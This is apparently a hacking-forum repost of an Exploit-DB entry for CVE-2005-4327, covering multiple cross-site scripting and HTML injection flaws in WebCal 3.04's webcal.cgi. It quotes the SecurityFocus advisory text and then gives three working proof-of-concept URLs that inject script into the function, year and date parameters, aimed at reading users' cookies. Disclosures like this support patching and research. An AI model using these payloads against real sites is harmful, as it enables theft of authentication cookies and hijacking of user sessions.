Exploit WebCal 3.0 4 - 'webcal.cgi' Multiple Cross-Site Scripting Vulnerabilities

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
26865
Проверка EDB
  1. Пройдено
Автор
STAN BUBROUSKI
Тип уязвимости
WEBAPPS
Платформа
CGI
CVE
cve-2005-4327
Дата публикации
2005-12-16
Код:
source: https://www.securityfocus.com/bid/15917/info

WebCal is prone to multiple HTML injection and cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content.

Attacker-supplied HTML and script code would be executed in the context of the affected Web site, potentially allowing for theft of cookie-based authentication credentials. An attacker could also exploit the HTML injection issue to control how the site is rendered to the user; other attacks are also possible.

These issues affect version 3.04; earlier versions may also be vulnerable. 

http://www.example.com/perl/webcal.cgi?function=<script>alert(document.cookie)</script>&cal=public
http://www.example.com/perl/webcal.cgi?function=webyear&cal=public&year=<script>alert(document.cookie)</script>
http://www.example.com/perl/webcal.cgi?function=webday&cal=public&date=<script>alert(document.cookie)</script>
 
Источник
www.exploit-db.com

Похожие темы